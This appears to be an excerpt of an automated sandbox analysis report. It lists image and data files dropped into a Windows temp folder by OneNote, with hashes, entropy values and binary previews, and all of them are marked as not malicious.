C:\Users\user\AppData\Local\Temp\{A076A4AA-0F21-4C19-A9BB-E1B0F93829E6}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Temp\{A36EF572-E656-49E5-B865-3D3E16CEF1EE}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.7073661021109723
Encrypted:	false
SSDEEP:	12:cvBObYyfdyokF2Uf7iOd/n+cFFBtyh1hVV/x/Hhs:cuYyf3kbjiC/nztqQ
MD5:	C3822DD8601E31FC048D1C5BB75BD6EE
SHA1:	1CB1519DA59CC4D2ACCB39EF1CF55830FDAF639B
SHA-256:	1D399FF6C59DB64CA344F71D5D1472BE757C1B7E0D793668CD061DC59FE59E57
SHA-512:	DD2A891A15F9E6207FD5D47C7C13498C5610FBF774CFE736960C2D01DC0E34BD6960A248419F7F1B041F831701FD2FB05B0DA43BFA3432461AB710160BBAA82B
Malicious:	false
Preview:	.R\{..M..Sx.)..to..s..J.\Q.....................?.....I...................................................................f.v.H.^E..Y...0.......................h...........................................:U.&...B.....yP.........'...q.O..4...t.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{A3F3841D-B321-46B9-AAA2-9E853EC5A8F0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6383482273684934
Encrypted:	false
SSDEEP:	6:Ra5lqjYyfB3h1RRXUnfgJMPHeoG/l9FFBl/FKLfJ98uRujlw//0lweI/Y98yRujd:Ra5QjYyf9/UfBWo2l9FFBtVWf/v
MD5:	5877E13C5DE3AB37B4BB2A0F746EF391
SHA1:	21A2B0FDDF7C9F58199626ACC88EFEA10CF90E57
SHA-256:	06AAC9855DF147A827B3B4D4E826D8A80FD182F7EAB637573C468E4543840FDD
SHA-512:	2591826D6C655FBC80CF57FB19F522FF1948EC660794A9C718908BA2F16542408FF242F11703A231E817BCFBF724E9DDC2F76BC7E9D259F561F354FB628C0818
Malicious:	false
Preview:	./.C..vL....W"v_.>N{...@.@7:..o.................?.....I...............................................................................................................h...........................................s..P..L.......[........#..O...B...T:.M.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{A7CE9C20-6A07-4B9A-BC35-0D3B49C84FFF}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Temp\{A907CBC0-8FC3-4B2F-B93E-10BA94BD8B4A}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Temp\{A9EFE9C7-D70C-4E98-A522-8FB825C2929B}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Temp\{AC2D9FB9-89F6-41B4-A8D6-EB9DCB357537}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Temp\{AE22EE38-5231-4F83-9839-14CB3A5354DE}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{B0887AA4-BD8D-4783-9530-69C1B7870BCB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Temp\{B42ED10A-6299-4B61-9206-56865A5E7640}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{B65DE754-875F-4951-8379-1F509291FAA7}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Temp\{B7D82D9F-14A6-4A24-BE5F-509D71B15398}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6521861564449223
Encrypted:	false
SSDEEP:	6:Raa3TYyfB3h1RRXUnfY+XIC+nGt9FFBl/FKfs13a1DRujlw//0lweI/a915Rujd:RaajYyf9/UfY+XIFkFFBt+sQWWf/a9K
MD5:	6D9707C0A85998F8E0313AB29B441F17
SHA1:	DBF57086D969356BCC8B2D6F68F493024CA8D1B0
SHA-256:	8F02E893852108A21C1180191E2E16F5656C79C524C5B5FFFEA964C62F2D908F
SHA-512:	04FCD812776F08A2D034541D86BC9DFE94DBA9F0CDBC9C795DD92B897D2CD0BCACFA2BDE5B3159CBB75D58018FF557F3B723F512CD3490114D16947820915986
Malicious:	false
Preview:	./.C..vL....W"v_.(..x..@....qI\|.................?.....I...............................................................................................................h...........................................S.Ol.u.I....82t.........\|..:..J.F.6g.B3............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{BBA26BAC-B347-4D83-B272-A6F633B58186}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6418826430051763
Encrypted:	false
SSDEEP:	6:Ra6FM8hkYyfB3h1RRXUnfHUKAggGshFFBl/FKx1VDRujlw//0lweI/QY5Rujd:Ra6FrhkYyf9/UfHTFshFFBt+VMWf/nU
MD5:	0FD62305C43795D78C8AD52FFBAE6E15
SHA1:	3DE3C296E26270853AF2FB6176544F074FC23BC3
SHA-256:	6C6744F350853AA589590E3539D48043D4ED7BF316FBB97A38A1393640282510
SHA-512:	13D7EB766C8E9948942694D4E2C12271BE9B3904410A69A23FBD3956EAF0DF8649AB03EBB711AD49793ED56CA7BD05BEFE74755BA954B9CA8C71C49203079DA4
Malicious:	false
Preview:	./.C..vL....W"v_I.ZP.\2@.._.~TBC................?.....I...............................................................................................................h............................................}..2.C...f..oe........w..Z.iLK...m.#..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{BBE4A5D5-CFE9-4562-86EE-5670CFE7CE25}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Temp\{BC067B2D-586C-4DE5-A87C-458F85978F1D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Temp\{BC677E0A-193B-48C7-AA09-4939B211FABA}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Temp\{BD00DC09-53B2-4DAD-B2EC-13B58CDFA2C5}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Temp\{BDD6C401-BB8D-4110-9193-7150C248EFF1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
